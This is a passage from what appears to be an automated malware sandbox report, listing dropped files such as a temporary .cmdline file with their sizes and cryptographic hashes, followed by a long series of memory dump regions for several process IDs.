                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                          SHA256

                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                          SHA512

                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\vzovoo2o\vzovoo2o.cmdline

                                                                                          Filesize

                                                                                          607B

                                                                                          MD5

                                                                                          90df951542721e76d599cd96ce1127ed

                                                                                          SHA1

                                                                                          bfcfc65f06dd8fa606916fa9d5c3ad929fbfbf17

                                                                                          SHA256

                                                                                          c76e11799c8fc191f45ee28504bf9798b0cf824905315b7058ad3fa2eb3d6645

                                                                                          SHA512

                                                                                          94189f6aec3c2e3fc8bac73f556afa05233879375b1e2d3013c773f4c626c790755966993251384a5fe1ff1b08f8b909d937f573c04600251a76f1725e239162

                                                                                        • memory/752-78-0x00007FFC1F8A0000-0x00007FFC1F8B4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/752-62-0x00007FFC1F8D0000-0x00007FFC1F8E9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/752-366-0x00007FFC0F950000-0x00007FFC0FFB5000-memory.dmp

                                                                                          Filesize

                                                                                          6.4MB

                                                                                        • memory/752-82-0x00007FFC1F8F0000-0x00007FFC1F915000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/752-83-0x00007FFC0E910000-0x00007FFC0E9C3000-memory.dmp

                                                                                          Filesize

                                                                                          716KB

                                                                                        • memory/752-76-0x00007FFC25D30000-0x00007FFC25D3F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/752-79-0x00007FFC1F920000-0x00007FFC1F94B000-memory.dmp

                                                                                          Filesize

                                                                                          172KB

                                                                                        • memory/752-80-0x00007FFC1F890000-0x00007FFC1F89D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/752-380-0x00007FFC0E910000-0x00007FFC0E9C3000-memory.dmp

                                                                                          Filesize

                                                                                          716KB

                                                                                        • memory/752-227-0x00007FFC1F700000-0x00007FFC1F733000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/752-228-0x00007FFC0E9D0000-0x00007FFC0EF03000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/752-29-0x00007FFC229B0000-0x00007FFC229D7000-memory.dmp

                                                                                          Filesize

                                                                                          156KB

                                                                                        • memory/752-32-0x00007FFC25D30000-0x00007FFC25D3F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/752-286-0x00007FFC0EF10000-0x00007FFC0EFDE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/752-25-0x00007FFC0F950000-0x00007FFC0FFB5000-memory.dmp

                                                                                          Filesize

                                                                                          6.4MB

                                                                                        • memory/752-300-0x00000152AF4F0000-0x00000152AFA23000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/752-70-0x00007FFC0F950000-0x00007FFC0FFB5000-memory.dmp

                                                                                          Filesize

                                                                                          6.4MB

                                                                                        • memory/752-74-0x00007FFC229B0000-0x00007FFC229D7000-memory.dmp

                                                                                          Filesize

                                                                                          156KB

                                                                                        • memory/752-72-0x00007FFC0E9D0000-0x00007FFC0EF03000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/752-73-0x00000152AF4F0000-0x00000152AFA23000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/752-71-0x00007FFC0EF10000-0x00007FFC0EFDE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/752-66-0x00007FFC1F700000-0x00007FFC1F733000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/752-64-0x00007FFC1F8C0000-0x00007FFC1F8CD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/752-109-0x00007FFC0F7D0000-0x00007FFC0F94F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/752-60-0x00007FFC0F7D0000-0x00007FFC0F94F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/752-58-0x00007FFC1F8F0000-0x00007FFC1F915000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/752-56-0x00007FFC25040000-0x00007FFC25059000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/752-54-0x00007FFC1F920000-0x00007FFC1F94B000-memory.dmp

                                                                                          Filesize

                                                                                          172KB

                                                                                        • memory/752-321-0x00007FFC0F7D0000-0x00007FFC0F94F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/752-315-0x00007FFC0F950000-0x00007FFC0FFB5000-memory.dmp

                                                                                          Filesize

                                                                                          6.4MB

                                                                                        • memory/752-351-0x00007FFC0F950000-0x00007FFC0FFB5000-memory.dmp

                                                                                          Filesize

                                                                                          6.4MB

                                                                                        • memory/752-378-0x00007FFC1F8A0000-0x00007FFC1F8B4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/752-391-0x00007FFC1F890000-0x00007FFC1F89D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/752-390-0x00007FFC0EF10000-0x00007FFC0EFDE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/752-389-0x00007FFC1F700000-0x00007FFC1F733000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/752-388-0x00007FFC1F8C0000-0x00007FFC1F8CD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/752-387-0x00007FFC1F8D0000-0x00007FFC1F8E9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/752-386-0x00007FFC0F7D0000-0x00007FFC0F94F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/752-385-0x00007FFC1F8F0000-0x00007FFC1F915000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/752-384-0x00007FFC25040000-0x00007FFC25059000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/752-383-0x00007FFC1F920000-0x00007FFC1F94B000-memory.dmp

                                                                                          Filesize

                                                                                          172KB

                                                                                        • memory/752-382-0x00007FFC25D30000-0x00007FFC25D3F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/752-381-0x00007FFC229B0000-0x00007FFC229D7000-memory.dmp

                                                                                          Filesize

                                                                                          156KB

                                                                                        • memory/752-377-0x00007FFC0E9D0000-0x00007FFC0EF03000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2892-225-0x000001D9AECE0000-0x000001D9AECE8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/4328-94-0x00000136E6B10000-0x00000136E6B32000-memory.dmp

                                                                                          Filesize

                                                                                          136KB